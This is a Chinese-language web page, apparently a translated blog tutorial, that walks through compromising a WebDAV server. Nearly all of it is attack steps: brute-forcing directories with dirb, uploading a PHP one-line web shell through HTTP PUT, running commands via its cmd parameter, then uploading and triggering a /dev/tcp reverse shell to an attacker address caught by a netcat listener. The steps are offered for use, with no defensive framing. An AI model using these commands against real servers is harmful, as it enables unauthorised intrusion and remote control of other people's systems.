在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
翻译总结自: https://shellgam3.com/2016/07/27/php-backdoor-reverse-shell-on-vulnerable-website/ 扫描Web服务器,爆破常见目录 dirb http://xxxxxxxx proxychains curl -X OPTIONS -v http://X.X.X.X/test/ 上面的请求应该是 WebDAV 服务器. 使用 “PUT” 方法可以上传文件 比如一句话:<?php echo system($_GET[“cmd”]); ?> 上传文件: proxychains curl --upload-file /root/Desktop/cmd.php -v --url http://X.X.X.X/test/cmd.php -0 --http1.0
浏览器访问:X.X.X.X/test/cmd.php?cmd=ls%20/
上传一个反弹shell exec 5<>/dev/tcp/xxx.xxx.xxx.xxx/443 proxychains curl --upload-file /root/Desktop/bash_shell.sh -v --url http://X.X.X.X/test/shell.sh -0 --http1.0 本机监听端口,比如netcat:sudo nc -v -l -p 443 浏览器访问:X.X.X.X/test/cmd.php?cmd=bash shell.sh
|
2022-07-18
2022-08-17
2022-11-06
2022-08-17
2022-08-15
请发表评论